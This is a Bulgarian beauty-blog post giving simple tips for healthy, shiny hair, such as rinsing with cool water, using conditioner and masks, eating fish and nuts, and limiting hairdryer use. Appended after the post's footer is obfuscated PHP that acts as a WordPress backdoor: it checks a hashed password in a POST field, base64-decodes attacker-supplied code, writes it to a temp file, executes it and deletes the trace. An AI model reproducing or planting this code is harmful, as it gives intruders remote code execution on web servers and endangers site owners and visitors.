Съвети за здрава и блестяща коса | Косопад

Съвети за здрава и блестяща коса

Кой не иска да има здрава и блестяща коса? Въпреки това, не винаги е лесно да я поддържаме в такава форма. Понякога косата е без блясък и без жизненост, като това може да се дължи на фактори като климат, хранене, пушене, стрес, балсам, хлор в басейна и др.

kosa-saveti

При всички тези условия, трябва да изключим тези фактори, които я застрашават и да засилим онези, които я подобряват. Ето някои съвети, които могат да са ви много полезни:

– Не прекалявайте с горещата вода, когато се къпете. Ако миете косата си с много гореща коса, може да я дехидратирате и да загуби блясъка си. Един от начините е като я плакнете със студена вода.

– Ако имате дълга коса, слагайте се балсам. От колко време не сте си правили маска на косата? Изберете най- подходящата за вас, така че да възстанови естествения ви блясък.

kosa-shampoan

– Хранете се балансирано. Доброто хранене се отразява не само психически, но и физически. Има храни, които са особено полезни за косата. Например, риба, орехи, спанак, моркови. Поддържайте се добре хидратирани .

– Ограничете употребата на сешоара. Този съвет е особено лесно приложим през топлите месеци. Високата температура изсушава и дехидратира косата.

– Използвайте добри продукти за коса. Мийте си косата с качествена козметика, за да е здрава и красива.

23. ноември 2014 13:49:50 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}